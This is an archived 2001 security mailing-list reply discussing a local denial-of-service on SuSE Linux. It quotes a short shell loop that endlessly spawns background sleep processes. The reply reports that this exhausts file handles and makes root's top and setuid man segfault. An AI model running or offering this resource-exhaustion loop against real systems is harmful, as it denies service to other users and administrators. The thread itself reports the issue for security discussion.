Mailinglist Archive: opensuse-security (465 mails)

< Previous Next >
Re: [suse-security] Classical DOS attack on Linux
  • From: Andreas Amann <andreas.amann@xxxxxxxx>
  • Date: Wed, 19 Dec 2001 14:26:26 +0100 (CET)
  • Message-id: <Pine.LNX.4.43.0112191426140.23594-100000@xxxxxxxxxxxxxxxx>
On Wed, 19 Dec 2001 martin@xxxxxxxxxxxxxxxxxxxxx wrote:

> while true ; do
> sleep 5000 &
> echo "sleep"
> done
>
> and got the system on it's knees. I tested the "Hater"
> variant and it "worked" too.
>
> The error message given from the system when running the
> sleep variant was:
>
> Too many open files in system
> cannot redirect standard input from /dev/null: Too many open files in
system
> ./testsleep: /bin/sleep: Too many open files in system
>

I tested that on SuSE 7.3, Kernel 2.4.15aa1 while logged in as normal user
on /dev/tty. I did not get the system to it's knees BUT:

During the 'while' run i was also logged in as root on the second console.
The following happened:

root[root]# top
Segmentation fault
root[root]# man top
Segmentation fault
root[root]# killall sleep
root[root]# top
[...] top runs [...]
root[root]# man top
[...] man top [...]

Of course no coredumps are written (file with 0 bytes, ulimit -c > 0).
Don't know how many binaries are affected by that but man (link to mandb)
runs setuid root.

Also to mention: The segfaults don't occur when man or top are executed as
normal user. Bash then complaints about too many open files and goes back
to the normal prompt.

Best regards,
--Andreas


< Previous Next >
Follow Ups
References